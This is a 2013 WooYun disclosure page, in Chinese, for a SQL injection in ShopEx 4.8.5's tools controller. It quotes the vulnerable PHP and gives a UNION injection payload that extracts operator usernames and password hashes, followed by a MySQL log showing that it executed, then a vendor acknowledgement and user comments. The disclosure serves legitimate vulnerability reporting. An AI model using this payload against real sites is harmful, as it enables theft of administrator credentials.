当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(22) 关注此漏洞

缺陷编号: WooYun-2013-24553

漏洞标题: shopex注入漏洞#1

相关厂商: ShopEx

漏洞作者: Code_Sec

提交时间: 2013-05-26 20:32

公开时间: 2013-08-24 20:33

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php源码分析

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-26: 细节已通知厂商并且等待厂商处理中
2013-05-26: 厂商已经确认,细节仅向厂商公开
2013-05-29: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2013-07-20: 细节向核心白帽子及相关领域专家公开
2013-07-30: 细节向普通白帽子公开
2013-08-09: 细节向实习白帽子公开
2013-08-24: 细节向公众公开

简要描述:

又是sql注入
测试版本:shopex-singel-4.8.5.78660

详细说明:

文件\core\shop\controller\ctl.tools.php

code 区域
function products(){
$objGoods = &$this->system->loadModel('goods/products');

$filter = array();
foreach(explode(',',$_POST['goods']) as $gid){
$filter['goods_id'][] = $gid;
}

$this->pagedata['products'] = $objGoods->getList($objGoods->defaultCols.',find_in_set(goods_id,"'.$_POST['goods'].'") as rank',$filter,0,-1,array('rank','asc'));



目测$_POST['goods']直接进入到sql语句中,由于部分文件加密开启sql语句执行记录日志

提交:

goods=aaa") FROM sdb_goods union select 1,concat(username,userpass),3,4,5,6,7,8,9,10,11,12,13 from sdb_operators%23

code 区域
130526 20:03:23	  352 Connect	root@localhost on 
352 Init DB shopex
352 Query SET NAMES 'utf8'
352 Query SELECT * FROM sdb_plugins WHERE plugin_type="app"
352 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='commodity_radar' LIMIT 0, 1
352 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='shopex_stat' LIMIT 0, 1
352 Query SELECT count(goods_id) FROM sdb_goods WHERE goods_id IN (0,0,0,3,4,5,6,7,8,9,10,11,12,13) AND sdb_goods.disabled = 'false' AND sdb_goods.goods_type='normal' ORDER BY rank asc
352 Query SELECT bn,name,cat_id,price,store,marketable,brand_id,weight,d_order,uptime,type_id,supplier_id,find_in_set(goods_id,"aaa") FROM sdb_goods union select 1,concat(username,userpass),3,4,5,6,7,8,9,10,11,12,13 from sdb_operators#") as rank,goods_id,image_default,thumbnail_pic,brief,pdt_desc,mktprice,big_pic FROM sdb_goods WHERE goods_id IN (0,0,0,3,4,5,6,7,8,9,10,11,12,13) AND sdb_goods.disabled = 'false' AND sdb_goods.goods_type='normal' ORDER BY rank asc LIMIT 0, 18446744073709551615



查看日志变量已经进入到sql语句中

漏洞证明:

2013-05-25_143659.jpg

修复方案:

过滤

版权声明:转载请注明来源 Code_Sec@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-05-26 23:16

厂商回复:

非常感谢您为shopex信息安全做的贡献
我们将尽快修复
非常感谢

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2013-05-26 20:35 | 墨迹哥 ( 路人 | Rank:11 漏洞数:1 | 蛋疼是我的专利,你如果比我更蛋腾,我就切...)
    0

    表示关注,亲,你太强大了。

  2. 2013-05-26 21:05 | 冷静 ( 路人 | Rank:3 漏洞数:2 )
    0

    拿奖

  3. 2013-05-27 07:58 | etcat ( 普通白帽子 | Rank:149 漏洞数:22 | 0101010101001010101010101010100101010101...)
    0

    亲 这个不错 好喜欢啊

  4. 2013-05-27 17:21 | 小痞子 ( 普通白帽子 | Rank:106 漏洞数:21 | <xss>alert("a")</xss>¥&@&……dssKhwjcw...)
    0

    亲 可以免费试用么?

  5. 2013-08-24 21:59 | Black Angel ( 普通白帽子 | Rank:165 漏洞数:36 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)
    0

    我手里表示也有一个- -

登录后才能发表评论,请先 登录